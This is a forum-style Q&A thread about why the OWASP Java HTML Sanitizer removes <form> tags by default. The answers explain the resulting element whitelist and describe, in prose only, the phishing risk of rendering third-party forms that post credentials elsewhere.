XSS - OWASP HTML Sanitizer Filters <form>

Question

I'm using the Java OWASP HTML Sanitizer (HtmlPolicyBuilder) to clean HTML being rendered in my web app, provided by 3rd party services.

Using some of the out of the box options, I notice that <form> tags are removed. I understand that I can include them with allowElements("form"), but is there a good reason to not allow forms?

What sort of XSS attacks should I be thinking about when rendering others' forms on my website?

---

For reference, my sanitization policy is:

new HtmlPolicyBuilder()
    .allowCommonBlockElements()
    .allowCommonInlineFormattingElements()
    .allowStyling()
    .allowStandardUrlProtocols()
    .toFactory()

Answer 1

As Sean pointed out someone could successfully phish some info from your users. To add a bit more info though, using just those canned methods, you'll have a pretty restricted whitelist, but perhaps that's what you want.

The elements you'd allow would be:

"b", "i", "font", "s", "u", "o", "sup", "sub", "ins", "del", "strong", "strike", "tt", "code", "big", "small", "br", "span", "em", "p", "div", "h1", "h2", "h3", "h4", "h5", "h6", "ul", "ol", "li","blockquote".

allowStyling just allows the style attribute globally. allowStandardUrlProtocols would allow urls with "http", "https", "mailto" protocols wherever you are referencing a url (a:href img:src q:cite etc..) but you don't allow any of these elements or attributes anyway so it's essentially useless.

You may want to spend time looking online at example whitelists (not just for OJHS) to get an idea of commonly allowed elements & attributes to better develop your whitelist.

Answer 2

One example is phishing. Display a username/password form, point the action parameter towards the attacker's web server, and trick users into believing they need to re-authenticate. Also if the users have autofill on, then the form could be automatically filled with username/password details.